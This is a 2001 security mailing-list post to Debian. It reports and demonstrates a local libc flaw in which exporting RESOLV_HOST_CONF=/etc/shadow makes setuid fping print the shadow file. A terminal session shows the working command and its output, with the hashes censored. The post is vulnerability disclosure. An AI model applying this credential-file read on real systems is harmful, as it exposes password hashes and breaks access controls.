Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
Since I've not had any response yet, I thought I'd give a demonstration of how
nasty this is:
Script started on Mon Jan 8 17:48:23 2001
thomas@io:~$ export RESOLV_HOST_CONF=/etc/shadow
thomas@io:~$ ping localhost
PING localhost (127.0.0.1): 56 data bytes
--- localhost ping statistics ---
2 packets transmitted, 0 packets received, 100% packet loss
thomas@io:~$ fping localhost
/etc/shadow: line 1: bad command `root:<censored>:11063:0:99999:7:::'
[snip]
/etc/shadow: line 73: bad command `gdm:!:11285:0:99999:7:::'
localhost is unreachable
thomas@io:~$ ls -l `which fping`
-rwsr-xr-x 1 root root 19728 May 15 2000 /usr/bin/fping
thomas@io:~$ ls -l `which ping`
-rwsr-xr-x 1 root root 15036 Dec 31 04:11 /bin/ping
thomas@io:~$ ldd `which fping`
libc.so.6 => /lib/libc.so.6 (0x40021000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
thomas@io:~$ ldd `which ping`
libc.so.6 => /lib/libc.so.6 (0x40021000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
thomas@io:~$ exit
Script done on Mon Jan 8 17:49:42 2001
It seems to work for some setuid programs, but not others. I'm running the
most recent packages from unstable as of today:
ii libc6 2.2-9 GNU C Library: Shared libraries and Timezone
ii netkit-ping 0.10-5 The ping utility from netkit
ii fping 2.2b1-2 Send ICMP ECHO_REQUEST packets to network ho
cheers,
Thomas
On Mon, 8 Jan 2001, thomas lakofski wrote:
> From: thomas lakofski <thomas@88.net>
> To: security@debian.org, debian-security@lists.debian.org
> Date: Mon, 8 Jan 2001 13:34:52 +0000 (GMT)
> Subject: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
>
> Hi,
>
> A friend of mine just tried this against my unstable box and successfully
> obtained the contents of /etc/shadow.
>
> I imagine that this is a problem in libc -- I'll leave it to
> security@debian.org to file bug reports.
>
> cheers,
>
> Thomas
>
>
--
who's watching your watchmen?
gpg: pub 1024D/81FD4B43 sub 4096g/BB6D2B11=>p.nu/d
2B72 53DB 8104 2041 BDB4 F053 4AE5 01DF 81FD 4B43
Reply to: